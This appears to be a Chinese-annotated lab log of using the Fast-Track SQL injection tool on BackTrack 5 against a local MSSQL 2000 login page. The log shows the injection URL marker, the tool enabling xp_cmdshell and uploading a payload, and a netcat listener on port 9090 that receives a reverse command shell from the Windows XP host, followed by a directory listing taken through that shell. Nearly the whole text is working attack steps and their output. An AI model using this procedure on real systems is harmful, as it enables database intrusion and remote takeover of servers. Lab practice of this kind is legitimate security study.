bt5上操作:
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
Enter which SQL Injector you want to use:
1. SQL Injector - Query String Parameter Attack
2. SQL Injector - POST Parameter Attack
3. SQL Injector - GET FTP Payload Attack
4. SQL Injector - GET Manual Setup Binary Payload Attack
(q)uit
Enter your choice: 4
*****************************************************************
** **
** Fast-Track - A new beginning... **
** Version: 4.0.2 **
** Written by: David Kennedy (ReL1K) **
** Lead Developer: Joey Furr (j0fer) **
** http://www.secmaniac.com **
** **
*****************************************************************
The manual portion allows you to customize your attack for whatever reason.
You will need to designate where in the URL the SQL Injection is by using 'INJECTHERE
So for example, when the tool asks you for the SQL Injectable URL, type:
http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
Enter the URL of the susceptible site, remember to put 'INJECTHERE for the injectible parameter
Example: http://www.thisisafakesite.com/blah.aspx?id='INJECTHERE&password=blah
<ctrl>-c to exit to Main Menu...
Enter here: http://192.168.1.109:8080/mssql2k/login?username='INJECTHERE
Enter the IP Address of server with NetCat Listening: 192.168.1.11
Enter Port number with NetCat listening: 9090
Sending initial request to enable xp_cmdshell if disabled....
Sending first portion of payload....
Sending second portion of payload....
Sending next portion of payload...
Sending the last portion of the payload...
Running cleanup...
Running the payload on the server...
另起一个bash运行nc获得了反向cmdshell:
root@bt:~# nc -l -p 9090
Microsoft Windows XP [版本 5.1.2600]
(C) 版权所有 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>cd ..
cd ..
C:\WINDOWS>cd ..
cd ..
C:\>dir
dir
驱动器 C 中的卷没有标签。
卷的序列号是 3052-FA52
C:\ 的目录
2012-03-24 11:55 0 AUTOEXEC.BAT
2012-03-24 11:55 0 CONFIG.SYS
2012-03-24 11:59 <DIR> Documents and Settings
2013-07-02 21:45 <DIR> msf3
2012-08-07 03:10 176,204,554 msf3.zip
2004-12-29 13:07 61,440 nc.exe
2013-07-01 22:45 <DIR> Program Files
2013-05-01 22:15 16,232,448 python-2.7.4.msi
2013-07-06 17:57 <DIR> Python27
2013-04-07 21:03 70,402,968 SQL2000SP4.exe
2013-06-30 21:58 <DIR> SQL2KSP4
2013-06-30 21:53 <DIR> SQLEVAL
2011-03-22 17:38 349,280,992 sqleval.exe
2013-07-01 20:52 <DIR> WINDOWS
2013-05-22 20:55 20,868,704 Wireshark-win32-1.8.7.exe
8 个文件 633,051,106 字节
7 个目录 3,908,493,312 可用字节
C:\>exit
exit
root@bt:~#